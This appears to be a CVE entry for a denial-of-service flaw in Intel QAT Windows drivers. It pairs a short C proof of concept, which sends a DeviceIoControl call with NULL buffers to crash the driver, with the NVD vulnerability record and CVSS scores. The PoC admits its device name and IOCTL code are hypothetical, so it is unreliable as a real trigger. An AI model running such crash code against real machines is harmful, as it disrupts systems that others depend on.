CVE-2026-20914

/* * PoC for CVE-2026-20914 * This code demonstrates a conceptual trigger for the Null Pointer Dereference * in Intel QAT software drivers for Windows before version 2.6.0. * Compile with: gcc poc.c -o poc */ #include <windows.h> #include <stdio.h> // Simulate the vulnerable function call structure typedef BOOL (*PFN_VULNERABLE_IOCTL)(HANDLE, DWORD, LPVOID, DWORD, LPVOID, DWORD, LPDWORD, LPOVERLAPPED); int main() { HANDLE hDevice; DWORD bytesReturned; // Attempt to open the QAT device (Symbolic link name may vary) hDevice = CreateFileA("\\\\.\\QATDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[!] Failed to open device. Error: %d\n", GetLastError()); printf("[!] This PoC requires the vulnerable driver to be loaded.\n"); return 1; } printf("[*] Device opened successfully.\n"); printf("[*] Sending malicious IOCTL to trigger Null Pointer Dereference...\n"); // Trigger the vulnerability by passing NULL as the input/output buffer // The specific IOCTL code (0x80002010) is hypothetical for this example BOOL result = DeviceIoControl(hDevice, 0x80002010, // Hypothetical IOCTL code NULL, // NULL Input Buffer (Trigger) 0, NULL, // NULL Output Buffer 0, &bytesReturned, NULL); if (!result) { printf("[!] DeviceIoControl failed. Error: %d\n", GetLastError()); printf("[*] If the system crashed or service stopped, the PoC was successful.\n"); } else { printf("[-] IOCTL returned success, vulnerability may not be triggered or patched.\n"); } CloseHandle(hDevice); return 0; }

{"cve": {"id": "CVE-2026-20914", "sourceIdentifier": "[email protected]", "published": "2026-05-12T17:16:19.887", "lastModified": "2026-05-15T20:05:09.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference for some Intel(R) QAT software drivers for Windows before version 2.6.0 within Ring 3: User Applications may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2.6.0-0018", "matchCriteriaId": "6416303E-851F-4530-875E-D349969919BE"}]}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01387.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}